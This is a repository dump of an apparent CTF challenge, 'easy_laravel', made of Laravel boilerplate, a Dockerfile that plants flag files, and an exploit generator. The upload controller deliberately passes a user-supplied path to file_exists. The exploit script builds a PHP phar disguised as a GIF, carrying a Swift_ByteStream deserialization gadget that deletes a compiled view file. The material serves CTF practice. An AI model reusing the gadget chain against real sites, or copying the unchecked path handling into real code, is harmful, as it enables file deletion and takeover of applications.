| * Vue is a modern JavaScript library for building interactive web interfaces 15 | * using reactive data binding and reusable components. Vue's API is clean 16 | * and simple, leaving you to focus on building your next great project. 17 | */ 18 | 19 | window.Vue = require('vue'); 20 | require('vue-resource'); 21 | 22 | /** 23 | * We'll register a HTTP interceptor to attach the "CSRF" header to each of 24 | * the outgoing requests issued by this application. The CSRF middleware 25 | * included with Laravel will automatically verify the header's value. 26 | */ 27 | 28 | Vue.http.interceptors.push((request, next) => { 29 | request.headers['X-CSRF-TOKEN'] = Laravel.csrfToken; 30 | 31 | next(); 32 | }); 33 | 34 | /** 35 | * Echo exposes an expressive API for subscribing to channels and listening 36 | * for events that are broadcast by Laravel. Echo and event broadcasting 37 | * allows your team to easily build robust real-time web applications. 38 | */ 39 | 40 | // import Echo from "laravel-echo" 41 | 42 | // window.Echo = new Echo({ 43 | // broadcaster: 'pusher', 44 | // key: 'your-pusher-key' 45 | // }); 46 | -------------------------------------------------------------------------------- /easy_laravel/config/broadcasting.php: -------------------------------------------------------------------------------- 1 | env('BROADCAST_DRIVER', 'null'), 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Broadcast Connections 23 | |-------------------------------------------------------------------------- 24 | | 25 | | Here you may define all of the broadcast connections that will be used 26 | | to broadcast events to other systems or over websockets. Samples of 27 | | each available type of connection are provided inside this array. 28 | | 29 | */ 30 | 31 | 'connections' => [ 32 | 33 | 'pusher' => [ 34 | 'driver' => 'pusher', 35 | 'key' => env('PUSHER_KEY'), 36 | 'secret' => env('PUSHER_SECRET'), 37 | 'app_id' => env('PUSHER_APP_ID'), 38 | 'options' => [ 39 | // 40 | ], 41 | ], 42 | 43 | 'redis' => [ 44 | 'driver' => 'redis', 45 | 'connection' => 'default', 46 | ], 47 | 48 | 'log' => [ 49 | 'driver' => 'log', 50 | ], 51 | 52 | 'null' => [ 53 | 'driver' => 'null', 54 | ], 55 | 56 | ], 57 | 58 | ]; 59 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/UploadController.php: -------------------------------------------------------------------------------- 1 | middleware(['auth', 'admin']); 15 | $this->path = storage_path('app/public'); 16 | } 17 | 18 | public function index() 19 | { 20 | return view('upload'); 21 | } 22 | 23 | public function upload(UploadRequest $request) 24 | { 25 | $file = $request->file('file'); 26 | if (($file && $file->isValid())) { 27 | $allowed_extensions = ["bmp", "jpg", "jpeg", "png", "gif"]; 28 | $ext = $file->getClientOriginalExtension(); 29 | if(in_array($ext, $allowed_extensions)){ 30 | $file->move($this->path, $file->getClientOriginalName()); 31 | Flash::success('上传成功'); 32 | return redirect(route('upload')); 33 | } 34 | } 35 | Flash::error('上传失败'); 36 | return redirect(route('upload')); 37 | } 38 | 39 | public function files() 40 | { 41 | $files = array_except(Storage::allFiles('public'), ['0']); 42 | return view('files')->with('files', $files); 43 | } 44 | 45 | public function check(Request $request) 46 | { 47 | $path = $request->input('path', $this->path); 48 | $filename = $request->input('filename', null); 49 | if($filename){ 50 | if(!file_exists($path . $filename)){ 51 | Flash::error('磁盘文件已删除,刷新文件列表'); 52 | }else{ 53 | Flash::success('文件有效'); 54 | } 55 | } 56 | return redirect(route('files')); 57 | } 58 | } -------------------------------------------------------------------------------- /easy_laravel/bootstrap/app.php: -------------------------------------------------------------------------------- 1 | singleton( 30 | Illuminate\Contracts\Http\Kernel::class, 31 | App\Http\Kernel::class 32 | ); 33 | 34 | $app->singleton( 35 | Illuminate\Contracts\Console\Kernel::class, 36 | App\Console\Kernel::class 37 | ); 38 | 39 | $app->singleton( 40 | Illuminate\Contracts\Debug\ExceptionHandler::class, 41 | App\Exceptions\Handler::class 42 | ); 43 | 44 | /* 45 | |-------------------------------------------------------------------------- 46 | | Return The Application 47 | |-------------------------------------------------------------------------- 48 | | 49 | | This script returns the application instance. The instance is given to 50 | | the calling script so we can separate the building of the instances 51 | | from the actual running of the application and sending responses. 52 | | 53 | */ 54 | 55 | return $app; 56 | -------------------------------------------------------------------------------- /easy_laravel/artisan: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | make(Illuminate\Contracts\Console\Kernel::class); 32 | 33 | $status = $kernel->handle( 34 | $input = new Symfony\Component\Console\Input\ArgvInput, 35 | new Symfony\Component\Console\Output\ConsoleOutput 36 | ); 37 | 38 | /* 39 | |-------------------------------------------------------------------------- 40 | | Shutdown The Application 41 | |-------------------------------------------------------------------------- 42 | | 43 | | Once Artisan has finished running. We will fire off the shutdown events 44 | | so that any final work may be done by the application before we shut 45 | | down the process. This is the last thing to happen to the request. 46 | | 47 | */ 48 | 49 | $kernel->terminate($input, $status); 50 | 51 | exit($status); 52 | -------------------------------------------------------------------------------- /easy_laravel/readme.md: -------------------------------------------------------------------------------- 1 | # Laravel PHP Framework 2 | 3 | [![Build Status](https://travis-ci.org/laravel/framework.svg)](https://travis-ci.org/laravel/framework) 4 | [![Total Downloads](https://poser.pugx.org/laravel/framework/d/total.svg)](https://packagist.org/packages/laravel/framework) 5 | [![Latest Stable Version](https://poser.pugx.org/laravel/framework/v/stable.svg)](https://packagist.org/packages/laravel/framework) 6 | [![Latest Unstable Version](https://poser.pugx.org/laravel/framework/v/unstable.svg)](https://packagist.org/packages/laravel/framework) 7 | [![License](https://poser.pugx.org/laravel/framework/license.svg)](https://packagist.org/packages/laravel/framework) 8 | 9 | Laravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable, creative experience to be truly fulfilling. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as authentication, routing, sessions, queueing, and caching. 10 | 11 | Laravel is accessible, yet powerful, providing tools needed for large, robust applications. A superb inversion of control container, expressive migration system, and tightly integrated unit testing support give you the tools you need to build any application with which you are tasked. 12 | 13 | ## Official Documentation 14 | 15 | Documentation for the framework can be found on the [Laravel website](http://laravel.com/docs). 16 | 17 | ## Contributing 18 | 19 | Thank you for considering contributing to the Laravel framework! The contribution guide can be found in the [Laravel documentation](http://laravel.com/docs/contributions). 20 | 21 | ## Security Vulnerabilities 22 | 23 | If you discover a security vulnerability within Laravel, please send an e-mail to Taylor Otwell at taylor@laravel.com. All security vulnerabilities will be promptly addressed. 24 | 25 | ## License 26 | 27 | The Laravel framework is open-sourced software licensed under the [MIT license](http://opensource.org/licenses/MIT). 28 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Kernel.php: -------------------------------------------------------------------------------- 1 | [ 27 | \App\Http\Middleware\EncryptCookies::class, 28 | \Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse::class, 29 | \Illuminate\Session\Middleware\StartSession::class, 30 | \Illuminate\View\Middleware\ShareErrorsFromSession::class, 31 | \App\Http\Middleware\VerifyCsrfToken::class, 32 | \Illuminate\Routing\Middleware\SubstituteBindings::class, 33 | ], 34 | 35 | 'api' => [ 36 | 'throttle:60,1', 37 | 'bindings', 38 | ], 39 | ]; 40 | 41 | /** 42 | * The application's route middleware. 43 | * 44 | * These middleware may be assigned to groups or used individually. 45 | * 46 | * @var array 47 | */ 48 | protected $routeMiddleware = [ 49 | 'auth' => \Illuminate\Auth\Middleware\Authenticate::class, 50 | 'auth.basic' => \Illuminate\Auth\Middleware\AuthenticateWithBasicAuth::class, 51 | 'bindings' => \Illuminate\Routing\Middleware\SubstituteBindings::class, 52 | 'can' => \Illuminate\Auth\Middleware\Authorize::class, 53 | 'guest' => \App\Http\Middleware\RedirectIfAuthenticated::class, 54 | 'throttle' => \Illuminate\Routing\Middleware\ThrottleRequests::class, 55 | 'admin' => \App\Http\Middleware\AdminMiddleware::class, 56 | ]; 57 | } 58 | -------------------------------------------------------------------------------- /easy_laravel/public/index.php: -------------------------------------------------------------------------------- 1 | 8 | */ 9 | 10 | /* 11 | |-------------------------------------------------------------------------- 12 | | Register The Auto Loader 13 | |-------------------------------------------------------------------------- 14 | | 15 | | Composer provides a convenient, automatically generated class loader for 16 | | our application. We just need to utilize it! We'll simply require it 17 | | into the script here so that we don't have to worry about manual 18 | | loading any of our classes later on. It feels nice to relax. 19 | | 20 | */ 21 | 22 | require __DIR__.'/../bootstrap/autoload.php'; 23 | 24 | /* 25 | |-------------------------------------------------------------------------- 26 | | Turn On The Lights 27 | |-------------------------------------------------------------------------- 28 | | 29 | | We need to illuminate PHP development, so let us turn on the lights. 30 | | This bootstraps the framework and gets it ready for use, then it 31 | | will load up this application so that we can run it and send 32 | | the responses back to the browser and delight our users. 33 | | 34 | */ 35 | 36 | $app = require_once __DIR__.'/../bootstrap/app.php'; 37 | 38 | /* 39 | |-------------------------------------------------------------------------- 40 | | Run The Application 41 | |-------------------------------------------------------------------------- 42 | | 43 | | Once we have the application, we can handle the incoming request 44 | | through the kernel, and send the associated response back to 45 | | the client's browser allowing them to enjoy the creative 46 | | and wonderful application we have prepared for them. 47 | | 48 | */ 49 | 50 | $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); 51 | 52 | $response = $kernel->handle( 53 | $request = Illuminate\Http\Request::capture() 54 | ); 55 | 56 | $response->send(); 57 | 58 | $kernel->terminate($request, $response); 59 | -------------------------------------------------------------------------------- /easy_laravel/app/Providers/RouteServiceProvider.php: -------------------------------------------------------------------------------- 1 | mapWebRoutes(); 39 | 40 | $this->mapApiRoutes(); 41 | 42 | // 43 | } 44 | 45 | /** 46 | * Define the "web" routes for the application. 47 | * 48 | * These routes all receive session state, CSRF protection, etc. 49 | * 50 | * @return void 51 | */ 52 | protected function mapWebRoutes() 53 | { 54 | Route::group([ 55 | 'middleware' => 'web', 56 | 'namespace' => $this->namespace, 57 | ], function ($router) { 58 | require base_path('routes/web.php'); 59 | }); 60 | } 61 | 62 | /** 63 | * Define the "api" routes for the application. 64 | * 65 | * These routes are typically stateless. 66 | * 67 | * @return void 68 | */ 69 | protected function mapApiRoutes() 70 | { 71 | Route::group([ 72 | 'middleware' => 'api', 73 | 'namespace' => $this->namespace, 74 | 'prefix' => 'api', 75 | ], function ($router) { 76 | require base_path('routes/api.php'); 77 | }); 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/Auth/RegisterController.php: -------------------------------------------------------------------------------- 1 | middleware('guest'); 40 | } 41 | 42 | /** 43 | * Get a validator for an incoming registration request. 44 | * 45 | * @param array $data 46 | * @return \Illuminate\Contracts\Validation\Validator 47 | */ 48 | protected function validator(array $data) 49 | { 50 | return Validator::make($data, [ 51 | 'name' => 'required|max:255', 52 | 'email' => 'required|email|max:255|unique:users', 53 | 'password' => 'required|min:6|confirmed', 54 | ]); 55 | } 56 | 57 | /** 58 | * Create a new user instance after a valid registration. 59 | * 60 | * @param array $data 61 | * @return User 62 | */ 63 | protected function create(array $data) 64 | { 65 | return User::create([ 66 | 'name' => $data['name'], 67 | 'email' => $data['email'], 68 | 'password' => bcrypt($data['password']), 69 | ]); 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/auth/passwords/email.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | 4 | @section('content') 5 |
6 |
7 |
8 |
9 |
Reset Password
10 |
11 | @if (session('status')) 12 |
13 | {{ session('status') }} 14 |
15 | @endif 16 | 17 |
18 | {{ csrf_field() }} 19 | 20 |
21 | 22 | 23 |
24 | 25 | 26 | @if ($errors->has('email')) 27 | 28 | {{ $errors->first('email') }} 29 | 30 | @endif 31 |
32 |
33 | 34 |
35 |
36 | 39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | @endsection 48 | -------------------------------------------------------------------------------- /easy_laravel/app/Exceptions/Handler.php: -------------------------------------------------------------------------------- 1 | expectsJson()) { 60 | return response()->json(['error' => 'Unauthenticated.'], 401); 61 | } 62 | 63 | return redirect()->guest('login'); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /easy_laravel/config/filesystems.php: -------------------------------------------------------------------------------- 1 | 'local', 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Default Cloud Filesystem Disk 23 | |-------------------------------------------------------------------------- 24 | | 25 | | Many applications store files both locally and in the cloud. For this 26 | | reason, you may specify a default "cloud" driver here. This driver 27 | | will be bound as the Cloud disk implementation in the container. 28 | | 29 | */ 30 | 31 | 'cloud' => 's3', 32 | 33 | /* 34 | |-------------------------------------------------------------------------- 35 | | Filesystem Disks 36 | |-------------------------------------------------------------------------- 37 | | 38 | | Here you may configure as many filesystem "disks" as you wish, and you 39 | | may even configure multiple disks of the same driver. Defaults have 40 | | been setup for each driver as an example of the required options. 41 | | 42 | */ 43 | 44 | 'disks' => [ 45 | 46 | 'local' => [ 47 | 'driver' => 'local', 48 | 'root' => storage_path('app'), 49 | ], 50 | 51 | 'public' => [ 52 | 'driver' => 'local', 53 | 'root' => storage_path('app/public'), 54 | 'visibility' => 'public', 55 | ], 56 | 57 | 's3' => [ 58 | 'driver' => 's3', 59 | 'key' => 'your-key', 60 | 'secret' => 'your-secret', 61 | 'region' => 'your-region', 62 | 'bucket' => 'your-bucket', 63 | ], 64 | 65 | ], 66 | 67 | ]; 68 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:5-apache-jessie 2 | 3 | LABEL Author="Virink " 4 | LABEL Blog="https://www.virzz.com" 5 | 6 | COPY easy_laravel/ /var/www/html/ 7 | 8 | WORKDIR /var/www/html 9 | 10 | RUN sed -i 's/deb.debian.org/mirrors.tuna.tsinghua.edu.cn/g' /etc/apt/sources.list && \ 11 | sed -i '/security/d' /etc/apt/sources.list && \ 12 | apt-get update -y && \ 13 | # Git for composer 14 | apt-get -yqq install git && \ 15 | # composer 16 | php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" && \ 17 | php composer-setup.php --install-dir=/usr/local/bin && \ 18 | mv /usr/local/bin/composer.phar /usr/local/bin/composer && \ 19 | php -r "unlink('composer-setup.php');" && \ 20 | composer install && \ 21 | # Apache config 22 | sed -i 's/DocumentRoot \/var\/www\/html/DocumentRoot \/var\/www\/html\/public/' /etc/apache2/sites-enabled/000-default.conf && \ 23 | sed -i "166s/AllowOverride None/AllowOverride All/" /etc/apache2/apache2.conf && \ 24 | ln -s /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/ && \ 25 | # Database 26 | mv .env.example .env && \ 27 | sed -i '/DB_DATABASE/d' .env && \ 28 | touch database/database.sqlite && \ 29 | php artisan key:generate && \ 30 | php artisan migrate && \ 31 | php artisan db:seed && \ 32 | php artisan vendor:publish --provider="Laracasts\\Flash\\FlashServiceProvider" && \ 33 | # Database admin password reset 34 | mv reset_admin_passwd.sh /usr/local/bin/reset_admin_passwd.sh && \ 35 | chmod +x /usr/local/bin/reset_admin_passwd.sh && \ 36 | # Flag 37 | mv flag.php ./storage/flag.php && \ 38 | cp ./storage/flag.php ./storage/framework/views/73eb5933be1eb2293500f4a74b45284fd453f0bb.php && \ 39 | touch -t 209911111111.11 ./storage/framework/views/73eb5933be1eb2293500f4a74b45284fd453f0bb.php && \ 40 | mv docker-php-entrypoint /usr/local/bin/docker-php-entrypoint && \ 41 | mv reset_admin_passwd.php /usr/local/bin/reset_admin_passwd && \ 42 | chmod +x /usr/local/bin/docker-php-entrypoint && \ 43 | echo 'flag{good_job_for_you}' > /th1s1s_F14g_2333333 && \ 44 | chown -R www-data:www-data . && \ 45 | chmod 777 -R storage/ && \ 46 | rm -rf /etc/apt/* 47 | 48 | ENTRYPOINT ["sh", "-c", "docker-php-entrypoint"] -------------------------------------------------------------------------------- /easy_laravel/resources/views/welcome.blade.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Laravel 9 | 10 | 11 | 12 | 13 | 14 | 66 | 67 | 68 |
69 | @if (Route::has('login')) 70 |
71 | Login 72 | Register 73 |
74 | @endif 75 | 76 |
77 |
78 | Easy-Laravel 79 |
80 |
81 |
82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /exp/easy_laravel_exp_gen.php: -------------------------------------------------------------------------------- 1 | _path = $path; 54 | $this->_mode = $writable ? 'w+b' : 'rb'; 55 | 56 | if (function_exists('get_magic_quotes_runtime') && @get_magic_quotes_runtime() == 1) { 57 | $this->_quotes = true; 58 | } 59 | } 60 | 61 | /** 62 | * Get the complete path to the file. 63 | * 64 | * @return string 65 | */ 66 | public function getPath() { 67 | return $this->_path; 68 | } 69 | } 70 | class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream { 71 | public function __construct() { 72 | $filePath = "/var/www/html/storage/framework/views/73eb5933be1eb2293500f4a74b45284fd453f0bb.php"; 73 | // $filePath = "/var/www/html/storage/framework/views/123"; 74 | // $filePath = '/Users/virink/Playground/2018/huwangbei/easy_laravel/storage/framework/views/123'; 75 | parent::__construct($filePath, true); 76 | } 77 | public function __destruct() { 78 | if (file_exists($this->getPath())) { 79 | @unlink($this->getPath()); 80 | } 81 | } 82 | } 83 | $obj = new Swift_ByteStream_TemporaryFileByteStream(); 84 | echo serialize($obj); 85 | $p = new Phar('./easy_laravel_exp.phar', 0); 86 | $p->startBuffering(); 87 | $p->setStub('GIF89a'); 88 | $p->setMetadata($obj); 89 | $p->addFromString('v.txt', 'text'); 90 | $p->stopBuffering(); 91 | copy('./easy_laravel_exp.phar', 'easy_laravel_exp.gif'); 92 | ?> -------------------------------------------------------------------------------- /easy_laravel/config/queue.php: -------------------------------------------------------------------------------- 1 | env('QUEUE_DRIVER', 'sync'), 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Queue Connections 23 | |-------------------------------------------------------------------------- 24 | | 25 | | Here you may configure the connection information for each server that 26 | | is used by your application. A default configuration has been added 27 | | for each back-end shipped with Laravel. You are free to add more. 28 | | 29 | */ 30 | 31 | 'connections' => [ 32 | 33 | 'sync' => [ 34 | 'driver' => 'sync', 35 | ], 36 | 37 | 'database' => [ 38 | 'driver' => 'database', 39 | 'table' => 'jobs', 40 | 'queue' => 'default', 41 | 'retry_after' => 90, 42 | ], 43 | 44 | 'beanstalkd' => [ 45 | 'driver' => 'beanstalkd', 46 | 'host' => 'localhost', 47 | 'queue' => 'default', 48 | 'retry_after' => 90, 49 | ], 50 | 51 | 'sqs' => [ 52 | 'driver' => 'sqs', 53 | 'key' => 'your-public-key', 54 | 'secret' => 'your-secret-key', 55 | 'prefix' => 'https://sqs.us-east-1.amazonaws.com/your-account-id', 56 | 'queue' => 'your-queue-name', 57 | 'region' => 'us-east-1', 58 | ], 59 | 60 | 'redis' => [ 61 | 'driver' => 'redis', 62 | 'connection' => 'default', 63 | 'queue' => 'default', 64 | 'retry_after' => 90, 65 | ], 66 | 67 | ], 68 | 69 | /* 70 | |-------------------------------------------------------------------------- 71 | | Failed Queue Jobs 72 | |-------------------------------------------------------------------------- 73 | | 74 | | These options configure the behavior of failed queue job logging so you 75 | | can control which database and table are used to store the jobs that 76 | | have failed. You may change them to any database / table you wish. 77 | | 78 | */ 79 | 80 | 'failed' => [ 81 | 'database' => env('DB_CONNECTION', 'mysql'), 82 | 'table' => 'failed_jobs', 83 | ], 84 | 85 | ]; 86 | -------------------------------------------------------------------------------- /easy_laravel/config/cache.php: -------------------------------------------------------------------------------- 1 | env('CACHE_DRIVER', 'file'), 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Cache Stores 23 | |-------------------------------------------------------------------------- 24 | | 25 | | Here you may define all of the cache "stores" for your application as 26 | | well as their drivers. You may even define multiple stores for the 27 | | same cache driver to group types of items stored in your caches. 28 | | 29 | */ 30 | 31 | 'stores' => [ 32 | 33 | 'apc' => [ 34 | 'driver' => 'apc', 35 | ], 36 | 37 | 'array' => [ 38 | 'driver' => 'array', 39 | ], 40 | 41 | 'database' => [ 42 | 'driver' => 'database', 43 | 'table' => 'cache', 44 | 'connection' => null, 45 | ], 46 | 47 | 'file' => [ 48 | 'driver' => 'file', 49 | 'path' => storage_path('framework/cache'), 50 | ], 51 | 52 | 'memcached' => [ 53 | 'driver' => 'memcached', 54 | 'persistent_id' => env('MEMCACHED_PERSISTENT_ID'), 55 | 'sasl' => [ 56 | env('MEMCACHED_USERNAME'), 57 | env('MEMCACHED_PASSWORD'), 58 | ], 59 | 'options' => [ 60 | // Memcached::OPT_CONNECT_TIMEOUT => 2000, 61 | ], 62 | 'servers' => [ 63 | [ 64 | 'host' => env('MEMCACHED_HOST', '127.0.0.1'), 65 | 'port' => env('MEMCACHED_PORT', 11211), 66 | 'weight' => 100, 67 | ], 68 | ], 69 | ], 70 | 71 | 'redis' => [ 72 | 'driver' => 'redis', 73 | 'connection' => 'default', 74 | ], 75 | 76 | ], 77 | 78 | /* 79 | |-------------------------------------------------------------------------- 80 | | Cache Key Prefix 81 | |-------------------------------------------------------------------------- 82 | | 83 | | When utilizing a RAM based store such as APC or Memcached, there might 84 | | be other applications utilizing the same cache. So, we'll specify a 85 | | value to get prefixed to all our keys so we can avoid collisions. 86 | | 87 | */ 88 | 89 | 'prefix' => 'laravel', 90 | 91 | ]; 92 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/auth/login.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 |
8 |
Login
9 |
10 |
11 | {{ csrf_field() }} 12 | 13 |
14 | 15 | 16 |
17 | 18 | 19 | @if ($errors->has('email')) 20 | 21 | {{ $errors->first('email') }} 22 | 23 | @endif 24 |
25 |
26 | 27 |
28 | 29 | 30 |
31 | 32 | 33 | @if ($errors->has('password')) 34 | 35 | {{ $errors->first('password') }} 36 | 37 | @endif 38 |
39 |
40 | 41 |
42 |
43 |
44 | 47 |
48 |
49 |
50 | 51 |
52 |
53 | 56 | 57 | 58 | Forgot Your Password? 59 | 60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 | @endsection 69 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/auth/passwords/reset.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 |
8 |
Reset Password
9 | 10 |
11 | @if (session('status')) 12 |
13 | {{ session('status') }} 14 |
15 | @endif 16 | 17 |
18 | {{ csrf_field() }} 19 | 20 | 21 | 22 |
23 | 24 | 25 |
26 | 27 | 28 | @if ($errors->has('email')) 29 | 30 | {{ $errors->first('email') }} 31 | 32 | @endif 33 |
34 |
35 | 36 |
37 | 38 | 39 |
40 | 41 | 42 | @if ($errors->has('password')) 43 | 44 | {{ $errors->first('password') }} 45 | 46 | @endif 47 |
48 |
49 | 50 |
51 | 52 |
53 | 54 | 55 | @if ($errors->has('password_confirmation')) 56 | 57 | {{ $errors->first('password_confirmation') }} 58 | 59 | @endif 60 |
61 |
62 | 63 |
64 |
65 | 68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 | @endsection 77 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/auth/register.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 |
8 |
Register
9 |
10 |
11 | {{ csrf_field() }} 12 | 13 |
14 | 15 | 16 |
17 | 18 | 19 | @if ($errors->has('name')) 20 | 21 | {{ $errors->first('name') }} 22 | 23 | @endif 24 |
25 |
26 | 27 |
28 | 29 | 30 |
31 | 32 | 33 | @if ($errors->has('email')) 34 | 35 | {{ $errors->first('email') }} 36 | 37 | @endif 38 |
39 |
40 | 41 |
42 | 43 | 44 |
45 | 46 | 47 | @if ($errors->has('password')) 48 | 49 | {{ $errors->first('password') }} 50 | 51 | @endif 52 |
53 |
54 | 55 |
56 | 57 | 58 |
59 | 60 |
61 |
62 | 63 |
64 |
65 | 68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 | @endsection 77 | -------------------------------------------------------------------------------- /easy_laravel/config/auth.php: -------------------------------------------------------------------------------- 1 | [ 17 | 'guard' => 'web', 18 | 'passwords' => 'users', 19 | ], 20 | 21 | /* 22 | |-------------------------------------------------------------------------- 23 | | Authentication Guards 24 | |-------------------------------------------------------------------------- 25 | | 26 | | Next, you may define every authentication guard for your application. 27 | | Of course, a great default configuration has been defined for you 28 | | here which uses session storage and the Eloquent user provider. 29 | | 30 | | All authentication drivers have a user provider. This defines how the 31 | | users are actually retrieved out of your database or other storage 32 | | mechanisms used by this application to persist your user's data. 33 | | 34 | | Supported: "session", "token" 35 | | 36 | */ 37 | 38 | 'guards' => [ 39 | 'web' => [ 40 | 'driver' => 'session', 41 | 'provider' => 'users', 42 | ], 43 | 44 | 'api' => [ 45 | 'driver' => 'token', 46 | 'provider' => 'users', 47 | ], 48 | ], 49 | 50 | /* 51 | |-------------------------------------------------------------------------- 52 | | User Providers 53 | |-------------------------------------------------------------------------- 54 | | 55 | | All authentication drivers have a user provider. This defines how the 56 | | users are actually retrieved out of your database or other storage 57 | | mechanisms used by this application to persist your user's data. 58 | | 59 | | If you have multiple user tables or models you may configure multiple 60 | | sources which represent each model / table. These sources may then 61 | | be assigned to any extra authentication guards you have defined. 62 | | 63 | | Supported: "database", "eloquent" 64 | | 65 | */ 66 | 67 | 'providers' => [ 68 | 'users' => [ 69 | 'driver' => 'eloquent', 70 | 'model' => App\User::class, 71 | ], 72 | 73 | // 'users' => [ 74 | // 'driver' => 'database', 75 | // 'table' => 'users', 76 | // ], 77 | ], 78 | 79 | /* 80 | |-------------------------------------------------------------------------- 81 | | Resetting Passwords 82 | |-------------------------------------------------------------------------- 83 | | 84 | | Here you may set the options for resetting passwords including the view 85 | | that is your password reset e-mail. You may also set the name of the 86 | | table that maintains all of the reset tokens for your application. 87 | | 88 | | You may specify multiple password reset configurations if you have more 89 | | than one user table or model in the application and you want to have 90 | | separate password reset settings based on the specific user types. 91 | | 92 | | The expire time is the number of minutes that the reset token should be 93 | | considered valid. This security feature keeps tokens short-lived so 94 | | they have less time to be guessed. You may change this as needed. 95 | | 96 | */ 97 | 98 | 'passwords' => [ 99 | 'users' => [ 100 | 'provider' => 'users', 101 | 'table' => 'password_resets', 102 | 'expire' => 60, 103 | ], 104 | ], 105 | 106 | ]; 107 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/layouts/app.blade.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | {{ config('app.name', 'Laravel') }} 12 | 13 | 14 | 15 | 16 | 17 | 22 | 23 | 24 |
25 | 90 | 91 | @yield('content') 92 |
93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /easy_laravel/config/database.php: -------------------------------------------------------------------------------- 1 | PDO::FETCH_OBJ, 17 | 18 | /* 19 | |-------------------------------------------------------------------------- 20 | | Default Database Connection Name 21 | |-------------------------------------------------------------------------- 22 | | 23 | | Here you may specify which of the database connections below you wish 24 | | to use as your default connection for all database work. Of course 25 | | you may use many connections at once using the Database library. 26 | | 27 | */ 28 | 29 | 'default' => env('DB_CONNECTION', 'mysql'), 30 | 31 | /* 32 | |-------------------------------------------------------------------------- 33 | | Database Connections 34 | |-------------------------------------------------------------------------- 35 | | 36 | | Here are each of the database connections setup for your application. 37 | | Of course, examples of configuring each database platform that is 38 | | supported by Laravel is shown below to make development simple. 39 | | 40 | | 41 | | All database work in Laravel is done through the PHP PDO facilities 42 | | so make sure you have the driver for your particular database of 43 | | choice installed on your machine before you begin development. 44 | | 45 | */ 46 | 47 | 'connections' => [ 48 | 49 | 'sqlite' => [ 50 | 'driver' => 'sqlite', 51 | 'database' => env('DB_DATABASE', database_path('database.sqlite')), 52 | 'prefix' => '', 53 | ], 54 | 55 | 'mysql' => [ 56 | 'driver' => 'mysql', 57 | 'host' => env('DB_HOST', 'localhost'), 58 | 'port' => env('DB_PORT', '3306'), 59 | 'database' => env('DB_DATABASE', 'forge'), 60 | 'username' => env('DB_USERNAME', 'forge'), 61 | 'password' => env('DB_PASSWORD', ''), 62 | 'charset' => 'utf8', 63 | 'collation' => 'utf8_unicode_ci', 64 | 'prefix' => '', 65 | 'strict' => true, 66 | 'engine' => null, 67 | ], 68 | 69 | 'pgsql' => [ 70 | 'driver' => 'pgsql', 71 | 'host' => env('DB_HOST', 'localhost'), 72 | 'port' => env('DB_PORT', '5432'), 73 | 'database' => env('DB_DATABASE', 'forge'), 74 | 'username' => env('DB_USERNAME', 'forge'), 75 | 'password' => env('DB_PASSWORD', ''), 76 | 'charset' => 'utf8', 77 | 'prefix' => '', 78 | 'schema' => 'public', 79 | 'sslmode' => 'prefer', 80 | ], 81 | 82 | ], 83 | 84 | /* 85 | |-------------------------------------------------------------------------- 86 | | Migration Repository Table 87 | |-------------------------------------------------------------------------- 88 | | 89 | | This table keeps track of all the migrations that have already run for 90 | | your application. Using this information, we can determine which of 91 | | the migrations on disk haven't actually been run in the database. 92 | | 93 | */ 94 | 95 | 'migrations' => 'migrations', 96 | 97 | /* 98 | |-------------------------------------------------------------------------- 99 | | Redis Databases 100 | |-------------------------------------------------------------------------- 101 | | 102 | | Redis is an open source, fast, and advanced key-value store that also 103 | | provides a richer set of commands than a typical key-value systems 104 | | such as APC or Memcached. Laravel makes it easy to dig right in. 105 | | 106 | */ 107 | 108 | 'redis' => [ 109 | 110 | 'cluster' => false, 111 | 112 | 'default' => [ 113 | 'host' => env('REDIS_HOST', 'localhost'), 114 | 'password' => env('REDIS_PASSWORD', null), 115 | 'port' => env('REDIS_PORT', 6379), 116 | 'database' => 0, 117 | ], 118 | 119 | ], 120 | 121 | ]; 122 | -------------------------------------------------------------------------------- /easy_laravel/config/mail.php: -------------------------------------------------------------------------------- 1 | env('MAIL_DRIVER', 'smtp'), 20 | 21 | /* 22 | |-------------------------------------------------------------------------- 23 | | SMTP Host Address 24 | |-------------------------------------------------------------------------- 25 | | 26 | | Here you may provide the host address of the SMTP server used by your 27 | | applications. A default option is provided that is compatible with 28 | | the Mailgun mail 